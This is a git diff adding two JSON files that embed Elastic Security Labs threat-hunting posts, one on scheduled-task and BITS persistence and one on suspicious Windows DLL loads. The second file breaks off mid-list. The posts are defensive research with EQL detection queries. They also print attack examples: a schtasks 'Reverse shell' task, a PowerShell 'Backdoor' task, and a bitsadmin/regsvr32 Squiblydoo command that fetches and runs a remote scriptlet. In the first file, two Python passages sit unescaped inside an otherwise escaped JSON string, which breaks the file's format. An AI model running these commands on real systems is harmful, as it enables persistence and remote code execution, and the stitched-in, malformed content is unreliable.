diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_persistence_using_elastic_security_part_2-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_persistence_using_elastic_security_part_2-md.json
new file mode 100644
index 00000000000..33fbcffff5e
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_persistence_using_elastic_security_part_2-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 2)\"\nslug: \"hunting-for-persistence-using-elastic-security-part-2\"\ndate: \"2022-06-21\"\ndescription: \"Learn how Elastic Endpoint Security and Elastic SIEM can be used to hunt for and detect malicious persistence techniques at scale.\"\nauthor:\n - slug: brent-murphy\n - slug: david-french\n - slug: elastic-security-intelligence-analytics-team\nimage: \"blog-thumb-shattered-lock.jpg\"\ncategory:\n - slug: adversary\n---\n\nIn Part 2 of this two-part series, our goal is to provide security practitioners with better visibility, knowledge, and capabilities relative to malicious persistence techniques that impact organizations around the world every day.\n\n[Part 1](https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1) explained what persistence is and why attackers need it. It introduced the Event Query Language ([EQL](https://www.elastic.co/blog/getting-started-eql)) before showing its practical use cases for threat hunting. Finally, it examined a popular technique used by adversaries to maintain persistence, Windows Management Instrumentation (WMI) Event Subscription ([T1084](https://attack.mitre.org/techniques/T1084/)). We shared how [Elastic Security](https://www.elastic.co/security) users can hunt for and detect this technique being used in their environment.\n\nIn this post, we’ll explore two additional persistence techniques that are being used by attackers in the wild: Scheduled Tasks ([T1053](https://attack.mitre.org/techniques/T1053/)) and BITS Jobs ([T1197](https://attack.mitre.org/techniques/T1197/)). 
This blog assumes you've already learned a little EQL as we walk through real-world examples and provide ready-to-use detection logic for each technique.\n\n## Persistence via scheduled tasks (T1053)\n\nWindows provides a built-in utility called schtasks.exe that allows you to create, delete, change, run, and end tasks on a local or remote computer. Scheduled tasks run at an elevated privilege level, which means this persistence mechanism can indirectly satisfy privilege escalation (TA0004) as well. It’s important to be aware of scheduled tasks that exist in your environment (such as maintenance or backup tasks) as well as tasks created during the installation of new software (like PDF readers or browsers). It's also essential for security teams to baseline their environment, as knowing all the legitimate ways that scheduled tasks are used will help you become a more effective hunter and identify anomalies more quickly.\n\nAn adversary may attempt to abuse scheduled tasks to execute programs at startup or on a regular cadence for persistence. Threat actors like [APT34](https://attack.mitre.org/groups/G0049/), [APT29](https://attack.mitre.org/groups/G0016/), and [FIN6](https://attack.mitre.org/groups/G0037/) have been known to use scheduled tasks as a means to persist. 
Figure 1 depicts some of the command line parameters available to schtasks.exe, which we can use as references when analyzing task creation events.\n\n```\n/Create - creates a new scheduled task\n/RU - specifies the \"run as\" user account\n/SC - specifies the schedule frequency\n/TN - specifies the string in the form of path\\name which uniquely identifies this scheduled task\n/TR - specifies the path and file name of the program to be run at the scheduled time\n/MO - specifies how often the task runs within its schedule type\n/F - forcefully creates the task and suppresses warnings if the specified task already exists\n```\n\n_Figure 1 - Portion of Windows schtasks.exe available command line parameters_\n\nFigure 2 shows an example of a schtasks.exe command. [This example](https://lolbas-project.github.io/lolbas/Binaries/Schtasks/) is from the popular [Living Off The Land Binaries and Scripts (LOLBAS)](https://lolbas-project.github.io/) project, which demonstrates how built-in, trusted operating system utilities can be abused by adversaries to achieve their objectives. Looking at the command line parameters in the example, we can see that the task named Reverse Shell is configured to execute the binary C:\\some\\directory\\revshell.exe every minute.\n\n```\nschtasks /create /sc minute /mo 1 /tn \"Reverse shell\" /tr C:\\some\\directory\\revshell.exe\n```\n\n_Figure 2 - Example of scheduled task creation using schtasks.exe_\n\nWindows PowerShell also includes several [ScheduledTasks cmdlets](https://docs.microsoft.com/en-us/powershell/module/scheduledtasks/?view=win10-ps) that can be used to create and manage scheduled tasks on Windows endpoints. Security teams can hunt for suspicious usage of these cmdlets including the ones listed in Figure 3. Organizations that have already deployed PowerShell 5.0 should consider monitoring suspicious script block logging events, Event ID 4104. 
A good resource on PowerShell visibility and recommended log sources to monitor can be found [here](https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html).\n\n```\nNew-ScheduledTaskAction - creates a scheduled task action\nNew-ScheduledTaskTrigger - creates a scheduled task trigger object\nRegister-ScheduledTask - registers a scheduled task definition on a local computer\n```\n\n_Figure 3 - Common PowerShell cmdlets for scheduled task creations_\n\nFigure 4 shows how these PowerShell cmdlets can be used to create and register a scheduled task.\n\n```\nPS C:\\> $A = New-ScheduledTaskAction -Execute \"cmd.exe\" -Argument \"/c C:\\Windows\\Temp\\backdoor.exe\"\nPS C:\\> $T = New-ScheduledTaskTrigger -Daily -At 9am\nPS C:\\> $D = New-ScheduledTask -Action $A -Trigger $T\nPS C:\\> Register-ScheduledTask Backdoor -InputObject $D\n```\n\n_Figure 4 - PowerShell cmdlets being used to create and register a scheduled task_\n\n## Real-world example: APT34 scheduled tasks abuse\n\nAs mentioned previously, APT34, a highly organized and technical state-sponsored threat group, is known to use scheduled tasks for persistence. The following visualization (Figure 5) depicts one of the ways a scheduled task can be used. In this case, we’re seeing the result of a victim opening a phishing lure (Step 1) — attributed to the APT34 threat group — via the Resolver view. Resolver is a critical enabler for security practitioners, as discussed in [Part 1](https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1). 
In this example, the following behaviors can be observed:\n\n- A malicious macro, embedded within a Microsoft Word document, was opened (Step 2)\n- Upon opening the Word document and executing the malicious macro, the native Windows script interpreter (wscript.exe) executed a script introduced by the adversary (Step 3)\n- The script created a callback to C2 while also establishing persistence via a scheduled task (Step 4)\n\n\n\nFigure 6 depicts the command line arguments parsed from the malicious scheduled task. Every minute, the native Windows Script Host utility, wscript.exe, will execute the malicious VBScript file, AppPool.vbs, which resides in the ProgramData subdirectory.\n\n\n\n## Hunting for scheduled tasks\n\nWith an understanding of the technique, observable artifacts, and common attributes of schtasks.exe execution, we're better prepared to succeed in our hunt for malicious scheduled task creation events. The EQL query in Figure 7 matches event sequences where the task scheduler process, schtasks.exe, is created by one of several commonly abused binaries and matches some of the command line parameters previously described. Uniquing on the command line allows us to focus our hunt on distinct task creations and their properties.\n\nThis query matches behaviors described in our earlier APT34 example, in which schtasks.exe descended from wscript.exe. Windows script host (WSH) is a script interpreter and should generally not have many descendants. In this case, it indicates that WSH was used to interpret a JScript or VBScript object that directly or by proxy implemented a scheduled task using schtasks.exe. 
This EQL query can also be saved as a custom rule in Elastic Endpoint Security so that analysts can be alerted every time this activity occurs.\n\n```\nprocess where subtype.create and\n process_name == \"schtasks.exe\" and\n descendant of\n [process where process_name in (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\")] and\n command_line == \"* /create*\" and\n wildcard(command_line, \"*/RU*\", \"*/SC*\", \"*/TN*\", \"*/TR*\", \"*/F*\")\n| unique command_line\n```\n\n_Figure 7 - EQL query to search for the creation of schtasks.exe as a descendant of commonly abused processes_\n\nIn [Elastic SIEM](https://www.elastic.co/siem), we can search for the use of the scheduled tasks utility and drag and drop fields of interest into the responsive Timeline (Figure 8) for further investigation. Data from multiple indices, or data sources, can be added to the [Timeline](https://www.elastic.co/guide/en/siem/guide/current/siem-ui-overview.html) view, which enables analysts to organize leads and investigate complex threats. [Version 7.6](https://www.elastic.co/blog/elastic-stack-7-6-0-released) introduced a detection engine that included 92 out-of-the-box rules for detection in Windows, Linux, network, and APM telemetry — as well as enabling users to create their own custom rules.\n\n\n\n## Other scheduled task considerations\n\nScheduled tasks may not seem sophisticated, but they are a great example of how hunters must understand the various ways that an adversary can schedule a task on a system. When shallowly monitoring a technique (i.e., only looking for use of schtasks.exe), a team can easily lull itself into a false sense of security. 
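For readers who want to experiment with the Figure 7 logic outside of Elastic Endpoint, a minimal sketch in Python over exported process-creation events might look like the following. The event shape and field names are assumptions, and EQL's descendant matching is simplified to a direct parent check:

```python
# Rough offline approximation of the Figure 7 hunt: schtasks.exe /create
# events spawned by a commonly abused binary, uniqued on command line.
SUSPECT_PARENTS = {"cmd.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe",
                   "wmic.exe", "mshta.exe", "powershell.exe"}

def hunt_schtasks(events):
    """Return unique schtasks.exe /create events with a suspicious parent."""
    seen, hits = set(), []
    for e in events:  # assumed keys: process_name, parent_name, command_line
        cmd = e["command_line"].lower()
        if (e["process_name"].lower() == "schtasks.exe"
                and e["parent_name"].lower() in SUSPECT_PARENTS
                and "/create" in cmd
                and cmd not in seen):
            seen.add(cmd)
            hits.append(e)
    return hits

events = [
    {"process_name": "schtasks.exe", "parent_name": "wscript.exe",
     "command_line": "schtasks /create /sc minute /mo 1 /tn Update /tr C:\\ProgramData\\AppPool.vbs"},
    {"process_name": "schtasks.exe", "parent_name": "explorer.exe",
     "command_line": "schtasks /query"},
]
print(len(hunt_schtasks(events)))  # → 1 (only the wscript.exe-spawned /create)
```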
Understanding adversary tradecraft and having access to the relevant telemetry is crucial for successful threat hunting.\n\nIt’s important to note that there are many other ways scheduled tasks can be abused by adversaries, including offensive security tools, custom scripts, .job files, the AT command, and directly via the [Task Scheduler API](https://docs.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-reference). Elastic Security provides detections and preventions for various TTPs related to scheduled task abuse and provides API-level visibility.\n\nIn the next section, we’ll analyze BITS jobs, how they are used by attackers in the wild, and a variety of methods to identify or detect this technique.\n\n## Persistence via BITS jobs (T1197)\n\nWindows [Background Intelligent Transfer Service (BITS)](https://docs.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal) is a built-in framework used to transfer files to and from web and SMB servers. Microsoft provides a utility called bitsadmin.exe and PowerShell cmdlets for managing the transfer of files.\n\nMicrosoft uses BITS to download and install updates in the background — using idle bandwidth. For example, if a user starts a Windows Update and signs out of the computer, or if a network connection is lost, BITS will resume the download automatically as soon as it is able. The capability to survive reboots makes it an ideal tool for attackers to transfer malicious files and possibly large volumes of data the actor plans to steal. Threat groups like [APT40](https://attack.mitre.org/groups/G0065/) and malware families such as the Qbot banking trojan have used BITS to transfer malicious files and set up persistence.\n\nFigure 9 shows some [parameters](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin) that can be used with bitsadmin.exe. 
We can identify interesting activity by focusing on creation and transfer command line options.\n\n```\n/create - creates a transfer job with the given display name\n/addfile - adds a file to the specified job\n/resume - activates a new or suspended job in the transfer queue\n/transfer - transfers one or more files\n/SetNotifyCmdLine - sets the command that will run when the job finishes transferring data or when a job enters a state\n/SetMinRetryDelay - sets the minimum length of time, in seconds, that BITS waits after encountering a transient error before trying to transfer the file\n```\n\n_Figure 9 - Parameters that can be used with the Windows bitsadmin.exe utility_\n\nFigure 10 shows an example of how the above parameters can be used to create a BITS job. The below example from the [bitsadminexec](https://github.com/3gstudent/bitsadminexec) project demonstrates how bitsadmin.exe can be used to execute the Squiblydoo technique, discovered by [Casey Smith](https://twitter.com/subTee). Squiblydoo utilizes regsvr32.exe to download an XML file that contains scriptlets for executing code on the victim machine. This [sample](https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct) executes calc.exe, but it’s a good use case for how this could be used maliciously:\n\n```\n# create backdoor\nbitsadmin /create backdoor\nbitsadmin /addfile backdoor %comspec% %temp%\\cmd.exe\nbitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe \"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll\"\nbitsadmin /Resume backdoor\n```\n\n_Figure 10 - Example of using bitsadmin.exe to execute Squiblydoo_\n\nSince BITS [version 4.0](https://docs.microsoft.com/en-us/windows/win32/bits/what-s-new) (standard in Windows Server 2008 R2 and Windows 7), PowerShell cmdlets can also be used to create and manage file transfer jobs. 
The PowerShell [cmdlets](https://docs.microsoft.com/en-us/windows/win32/bits/bits-powershell-commands) for BITS provide much of the same functionality as the bitsadmin.exe command line utility, a subset of which are depicted in Figure 11:\n\n```\nAdd-BitsFile - adds one or more files to a BITS transfer\nResume-BitsTransfer - resumes a suspended BITS transfer job\nSet-BitsTransfer - modifies the properties of a BITS transfer job\nStart-BitsTransfer - creates and starts a BITS transfer job\n```\n\n_Figure 11 - Common PowerShell cmdlets for BITS_\n\nA good cmdlet to monitor is Start-BitsTransfer. The local and remote names of the file are specified in the Source and Destination parameters. This is depicted in Figure 12. As stated previously, analysts should monitor suspicious script block logging events, Event ID 4104, in the Microsoft-Windows-PowerShell/Operational log.\n\n\n\n## Hunting for malicious BITS jobs\n\nThe EQL query in Figure 13 demonstrates some of the command line arguments you might see while hunting for malicious use of bitsadmin.exe. The query searches for a process creation event for the bitsadmin.exe binary and the common command line parameters associated with the creation or transfer of a BITS job, and returns unique results based on the command line value. 
Focusing on unique results while hunting narrows the data set and makes anomalous activity easier to spot.\n\n```\nprocess where subtype.create and\n process_name == \"bitsadmin.exe\" and\n wildcard(command_line, \"*Transfer*\", \"*Create*\", \"*AddFile*\", \"*SetNotifyCmdLine*\",\n \"*SetMinRetryDelay*\", \"*Resume*\")\n| unique command_line\n```\n\n_Figure 13 - EQL query looking for common bitsadmin.exe command line parameters_\n\nAdditionally, during rule creation, you have the option to enable a \"Reflex Response.\" With “Reflex Response,” when behavior defined in a custom rule is detected, Endpoint Security uses its unique telemetry-gathering and enrichment to execute an automated response before damage and loss can occur (Figure 14). This functionality enables analysts to take action to stop the malicious behavior and then investigate the events that led up to and occurred after the threat, as opposed to investigating a current threat that may be past the point of remediation.\n\n\n\nExecuting an EQL hunt in the Endpoint Security product using the EQL query from above can lead to finding real-world campaigns like Qbot, shown in Figure 15.\n\n\n\n## Real-world example: Qbot malware\n\nQBot is a widely distributed banking Trojan that is capable of self-replication and has historically relied on PowerShell. Recently, however, PowerShell may have been [abandoned](https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/) in favor of bitsadmin.exe — an application unlikely to be scrutinized as aggressively.\n\nThis variant utilizes a .vbs dropper masquerading as a .doc file, as Windows still hides the original filename extension by default. 
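As a side note, the double-extension masquerade just described (a .vbs dropper posing as a .doc because Windows hides known extensions by default) is straightforward to screen for. The helper below is purely illustrative; the extension lists are assumptions:

```python
from pathlib import Path

# Flag filenames that present a benign-looking "inner" extension while the
# real (hidden-by-default) extension is a script type, e.g. Invoice.doc.vbs.
SCRIPT_EXTS = {".vbs", ".js", ".jse", ".wsf", ".hta"}
DECOY_EXTS = {".doc", ".docx", ".pdf", ".xls", ".xlsx"}

def is_double_extension_lure(filename: str) -> bool:
    suffixes = Path(filename.lower()).suffixes
    return (len(suffixes) >= 2
            and suffixes[-1] in SCRIPT_EXTS
            and suffixes[-2] in DECOY_EXTS)

print(is_double_extension_lure("Invoice.doc.vbs"))  # → True
print(is_double_extension_lure("report.docx"))      # → False
```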
Upon execution, in this case via the parent process wscript.exe, the malware spawns bitsadmin.exe to create a transfer job that downloads a subsequent payload, shown in the Timeline view in the SIEM app (Figure 16).\n\n\n\nAnalyzing the process.args field values as depicted in Figure 17 reveals that the malware takes the following actions:\n\n- Creates a randomly named transfer job with high priority\n- Uses bitsadmin.exe to download its second stage payload from a command & control (C2) server (Note that widgetcontrol.png is actually a Windows executable)\n- Base64 encodes data on the endpoint’s operating system version and antivirus software, which it passes back to C2 in the beacon URI\n- Randomizes the name of the payload and writes it to a subfolder of the %AppData% path\n\n\n\nThis example showcases how threat actors can use a less common, built-in utility to attempt to bypass traditional defenses: bitsadmin.exe is effective for transferring files and maintaining a presence in a victim environment.\n\n## Other BITS and pieces\n\nThe Microsoft-Windows-Bits-Client/Operational.evtx log file is a native Microsoft event log. It records every operation executed by the BITS client, either via bitsadmin.exe or PowerShell. Within that log store, Event ID 3 is used when the BITS service creates a new job. [Winlogbeat](https://www.elastic.co/downloads/beats/winlogbeat) can be configured to monitor that event.provider as shown in Figure 18. Elastic Security provides telemetry, detections, and threat hunting capabilities for BITS abuse at enterprise scale.\n\n\n\n## Conclusion\n\nIn this blog series, we examined popular techniques that attackers use to maintain a presence in their target environments. The number of techniques in an attacker’s arsenal can seem daunting at first, but we demonstrated a formulaic approach to examining, hunting for, and detecting techniques effectively. 
By building comprehension around adversary tradecraft, you can identify interesting patterns, behaviors, and artifacts that you can use to your advantage.\n\nElastic Security makes hunting for persistence easy. The features of Elastic Endpoint Security and SIEM — along with the protections provided out of the box — lower the barriers to entry for analysts, provide detailed visibility into endpoint activity, and enable organizations to prevent, detect, and respond to malicious behavior at scale.\n\nTry [Elastic SIEM](https://www.elastic.co/security/siem) for free today. To learn more about threat hunting, download a free copy of [The Elastic Guide to Threat Hunting](https://ela.st/threat-hunting).\n\nView our webinar on [Hunting for persistence using Elastic Security](https://www.elastic.co/webinars/hunting-for-persistence-using-elastic-security).\n\nPlus, [EQL support is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581)!\n"
+ },
+ "title": "Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 2)",
+ "slug": "hunting-for-persistence-using-elastic-security-part-2",
+ "date": "2022-06-21",
+ "description": "Learn how Elastic Endpoint Security and Elastic SIEM can be used to hunt for and detect malicious persistence techniques at scale.",
+ "author": [
+ {
+ "slug": "brent-murphy"
+ },
+ {
+ "slug": "david-french"
+ },
+ {
+ "slug": "elastic-security-intelligence-analytics-team"
+ }
+ ],
+ "image": "blog-thumb-shattered-lock.jpg",
+ "category": [
+ {
+ "slug": "adversary"
+ }
+ ]
+ },
+ "id": "security_labs_content-hunting_for_persistence_using_elastic_security_part_2-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_suspicious_windows_libraries_for_execution_and_evasion-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_suspicious_windows_libraries_for_execution_and_evasion-md.json
new file mode 100644
index 00000000000..3f49478be82
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_suspicious_windows_libraries_for_execution_and_evasion-md.json
@@ -0,0 +1,35 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Hunting for Suspicious Windows Libraries for Execution and Defense Evasion\"\nslug: \"Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion\"\ndate: \"2023-03-01\"\ndescription: \"Learn more about discovering threats by hunting through DLL load events, one way to reveal the presence of known and unknown malware in noisy process event data.\"\nauthor:\n - slug: samir-bousseaden\nimage: \"blog-thumb-roman-columns.jpg\"\ncategory:\n - slug: security-operations\n - slug: security-research\n - slug: detection-science\ntags:\n - detection engineering\n - threat hunting\n - threat detection\n---\n\nDynamic-link library (DLL) image loads are among the noisiest event types in Windows, which may discourage defenders from using them for detection engineering or threat hunting. Even when this data is logged, it’s often limited to function-specific DLLs such as scheduled tasks (taskschd.dll) and Windows Management Instrumentation (wmiutils.dll), and potentially DLLs loading from a few suspicious folders. In addition to the data volume issue, the false positive (FP) rate of detection rules using DLL events also tends to be proportional to the data volume.\n\nUnfortunately, both advanced adversaries and commodity malware take advantage of those limitations to increase their chances of success, especially during the delivery phase via diverse spear phishing procedures.\n\nThe most commonly observed delivery techniques are the following:\n\n- Loading malicious DLLs using binary execution proxies Rundll32 and Regsvr32\n- Sideloading a malicious DLL from a virtual disk image (ISO/VHD files) into a convenient signed benign binary\n- Extracting a DLL from a malicious Microsoft Office document (e.g. 
Word, Excel) and immediately loading it via Visual Basic for Applications (VBA)\n- Downloading or extracting a DLL using a [lolbin](https://lolbas-project.github.io/) and loading it via another program\n- Sideloading a malicious DLL extracted from a compressed archive (zip, rar, etc.) into a signed benign binary\n- Dropping a malicious DLL in the current directory of an existing program vulnerable to DLL sideloading (e.g. OneDrive, Slack, Teams) via one of several means\n- Less common but also very effective is the use of Windows Installer MSIEXEC to load a malicious DLL\n\n# What DLL events do we log with Elastic Endpoint?\n\nWith the exception of the following Microsoft DLLs, Elastic Endpoint has recorded all non-Microsoft-signed DLLs since version 7.16: \n\nWe also added some enrichments to both DLL and process events that record the following metadata: \n\nBelow is an example of device information for DLL and process execution from mounted ISO and VHD files, two file objects increasingly used to deliver malware: \n\nHere is an example of process execution relative file creation and modification times for svchost.exe: \n\nThe relative execution time enrichment will help us create less noisy detection rules (we can match our rules against the first few image load or process execution instances), and the device information will allow us to better target suspicious use of ISO/VHD files for malicious purposes.\n\n# Detection\n\nIn this section, we share some detection ideas that are both reliable signals and effectively match the most common scenarios mentioned earlier.\n\n## DLL via Rundll32 / Regsvr32\n\nAs captured in our own [Global Threat Report](https://www.elastic.co/security-labs/2022-elastic-global-threat-report-announcement), Rundll32 and Regsvr32 lolbins are two of the most abused binary execution proxies. 
These utilities can load malicious DLLs and are a commonly seen component of many phishing attacks (malicious shortcuts, ISO files, macro-enabled documents): \n\nDuring a recent period of about 90 days, our internal malware sandbox saw roughly 21K malware alerts where the malicious file was a DLL loaded by either regsvr32 or, to a lesser degree, rundll32.\n\nThe following two endpoint behavior protection rules are effective against about 80% of those samples (~17k out of ~21k) leveraging rundll32 or regsvr32 to execute malicious modules:\n\n- [Unusual DLL Extension Loaded by Rundll32 or Regsvr32](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_unusual_dll_extension_loaded_by_rundll32_or_regsvr32.toml)\n- [RunDLL32/Regsvr32 Loads Dropped Executable](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_rundll32_regsvr32_loads_dropped_executable.toml)\n\n### Rundll32 or Regsvr32 Executing an Oversized File\n\nThe following EQL query correlates the creation of an executable file with a size equal to or greater than 100MB (this threshold can be adjusted to your environment), subsequently followed by that file being loaded as a DLL via rundll32 or regsvr32:\n\n\n\nBelow are examples of malicious control panel (CPL) files with sizes over 700MB, a technique used to bypass AV file scanning and reputation-based cloud services that implement a maximum file size for uploaded files:\n\n\n\n### Rundll32 or Regsvr32 Loading a DLL with a Suspicious Original File Name\n\nSome malicious DLLs have a suspicious original file name, such as one ending with a .EXE extension or with a great mismatch between the length of the original file name and the actual DLL name. 
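The two heuristics just described (an original file name ending in .EXE, or a large length mismatch between the original file name and the on-disk DLL name) are easy to prototype. The function below is an illustrative sketch; the threshold and field values are assumptions:

```python
# Flag loaded DLLs whose PE "original file name" looks inconsistent with the
# on-disk name: a .exe original name, or a large length mismatch between them.
def suspicious_original_name(dll_name: str, original_name: str,
                             length_delta: int = 10) -> bool:
    dll, orig = dll_name.lower(), original_name.lower()
    if orig.endswith(".exe"):
        return True
    return abs(len(orig) - len(dll)) >= length_delta

print(suspicious_original_name("helper.dll", "payload.exe"))             # → True
print(suspicious_original_name("a.dll", "averyverylongmodulename.dll"))  # → True
print(suspicious_original_name("version.dll", "version.dll"))            # → False
```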
This kind of defense evasion is less common and is employed by a good number of known malware families:\n\n\n\nA few examples:\n\n\n\n## DLL via Disk Images\n\nEmbedding malicious payloads in virtual disk images isn’t new or particularly novel, but the technique has gained in popularity among commodity malware families.\n\n### Suspicious ImageLoad from an ISO Mounted Device\n\nThe following rule looks for the execution of commonly-abused Windows binaries to load a DLL from a mounted virtual disk image:\n\n\n\nBelow are some examples of the technique:\n\n\n\n### Suspicious Microsoft Image Loaded from a Disk Image\n\nThe following rule is triggered when an executable, running from a mounted virtual disk image (.vhd, .iso), loads a suspicious Microsoft-signed DLL such as the taskschd, bitsproxy or vaultclient modules that are associated with some common malware capabilities like persistence, credential access, and evasion.\n\n\n\nThis query identifies many commodity malware families delivered via ISO files:\n\n\n\n### Potential DLL SideLoad via a Renamed Signed Binary\n\nThe following query identifies attempts to load an unsigned DLL from a mounted virtual disk (.iso, .vhd) using a renamed signed binary (the original file name is different from the process name).\n\n\n\nThis depicts some examples of matches where a signed and renamed program is loading a DLL from a mounted disk image:\n\n\n\n### Potential DLL SideLoad via a Microsoft Signed Binary\n\nThis detection identifies attempts to load unsigned DLLs from a mounted virtual disk (.iso, .vhd) using a signed Microsoft binary:\n\n\n\nBelow is an example in which Microsoft OneDrive and Windows Control Panel executables are abused to sideload malicious modules for initial access and execution.\n\n\n\n## DLL from Archive Files\n\nSimilarly to virtual disk images, attackers can also use ZIP/RAR archive files with an embedded malicious DLL paired with a trusted binary or a shortcut (LNK) file to gain access.\n\n\n\nThe 
following screen capture shows how this query identifies a malicious file from a RAR archive that was auto-extracted into a temporary user directory. This scenario is moderately common.\n\n\n\n## DLL via Malicious Documents\n\nMicrosoft Office documents can also be used to deploy and load a malicious DLL to avoid spawning a suspicious child process. The following query correlates an executable (PE) file creation event with a DLL load event.\n\n\n\nBelow are some examples of malicious Word and Excel documents using this delivery technique.\n\n\n\n## DLL via MSIEXEC\n\nMsiExec is another attractive option for executing malicious DLLs because the activity blends in well with legitimate software installers. Two observed delivery methods are:\n\n- Calling the DLLRegisterServer export from a random DLL using the command-line arguments /y or /z as documented here\n- Building an installer that uses custom actions to load and execute a DLL as documented here and here\n\nThe following query can be used to identify the execution of the built-in Windows Installer, MSIEXEC, to call the exported function and run code:\n\n\n\nExamples where MSI is used to load malicious DLLs:\n\n\n\nDLLs delivered via Windows Installer custom actions can be detected by correlating a DLL file creation event where the calling process is MsiExec and where that DLL is subsequently loaded by the same MsiExec process.\n\nIt's worth noting that there are some legitimate uses of Windows Installer custom actions and this query may require some filtering in environments where those are used.\n\n\n\nThe following query matches the Gwisin Ransomware documented by [AhnLab](https://asec.ahnlab.com/en/37483/) and for which a [PoC](https://github.com/ChoiSG/GwisinMsi) has been created.\n\n## DLL delivery via lolbins\n\nSome malware relies on trusted Microsoft binaries to download, decode or extract DLLs. 
This query correlates PE file creation or modification by common built-in tools, followed by an image load.\n\n\n\nExamples of malware identified using this detection approach:\n\n\n\n## DLL sideload into existing program\n\nThe following detection identifies attempts to load a recently created, unsigned DLL file by an already existing signed process within the same current directory. By comparing the creation time of the existing program with the creation time of the DLL, we can spot these kinds of anomalies.\n\n\n\nThe next example matches when the malicious secure32.dll file (created 28 seconds ago) is written to the OneDrive current directory and automatically loaded by OneDrive.exe (created 2.5 years ago):\n\n\n\n## DLL loading from suspicious directories\n\nDropping a DLL into a user-writable directory and sideloading it with a trusted binary is also a common pattern. The following query looks for this behavior and, by leveraging relative creation and modification times, it can reduce the alert volume while limiting matches to a time window following initial execution.\n\n\n\nThe most commonly-targeted user-writable directories are `?:\\Users\\Public` and `?:\\ProgramData`. The full query containing more than 70 suspicious folders can be found [here](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml).\n\nBelow is an example depicting malicious matches where various trusted binaries were abused to load malicious DLLs: \n\n\n\n## DLL load with an abnormal creation time\n\nAnother interesting scenario is identifying a DLL load event where the DLL has a suspicious creation time, which could be a result of timestomping. 
This query identifies inconsistencies between the creation time and the file name modification time, using dll.Ext.relative_file_name_modify_time and dll.Ext.relative_file_creation_time, immediately followed by an image load: \n\nThe following is an example where malware drops DLLs in trusted directories and then uses timestomping to ensure those DLLs blend in with existing files in those directories: \n\n## DLL from removable device\n\nDLL side-loading from a removable device is still a valid infection vector, especially for air-gapped networks. An example was recently shared by [Mandiant](https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia) involving an espionage-oriented threat. The following EQL query can be used to find similar behavior: \n\nHere is an example with several matches: \n\n## Protection Rules\n\nElastic provides significant capabilities for identifying unusual or malicious library load events with existing behavior protection rules that take advantage of Windows Libraries events:\n\n- [NTDLL Loaded from an Unusual Path](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_ntdll_loaded_from_an_unusual_path.toml)\n- [Suspicious NTDLL Image Load](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_ntdll_image_load.toml)\n- [DLL Loaded from an Archive File](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_dll_loaded_from_an_archive_file.toml)\n- [Microsoft Office Loaded a Dropped Executable File](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_microsoft_office_loaded_a_dropped_executable_file.toml)\n- [Suspicious ImageLoad from an ISO Mounted Device](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_imageload_from_an_iso_mounted_device.toml)\n- [Potential Evasion via Oversized Image 
Load](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_evasion_via_oversized_image_load.toml)\n- [Suspicious ImageLoad via Windows Update Auto Update Client](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_imageload_via_windows_update_auto_update_client.toml)\n- [Privilege Escalation via Microsoft Exchange DLL Hijacking](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_privilege_escalation_via_microsoft_exchange_dll_hijacking.toml)\n- [Potential DLL SideLoad via a Microsoft Signed Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_dll_sideload_via_a_microsoft_signed_binary.toml)\n- [Potential DLL SideLoad via a Renamed Signed Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_dll_sideload_via_a_renamed_signed_binary.toml)\n- [Library Load of a File Written by a Signed Binary Proxy](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_library_load_of_a_file_written_by_a_signed_binary_proxy.toml)\n- [Potential DLL Search Order Hijacking of an Existing Program](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_dll_search_order_hijacking_of_an_existing_program.toml)\n- [Suspicious DLLRegisterServer Execution via MSIEXEC](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_dllregisterserver_execution_via_msiexec.toml)\n- [ImageLoad of a File dropped via 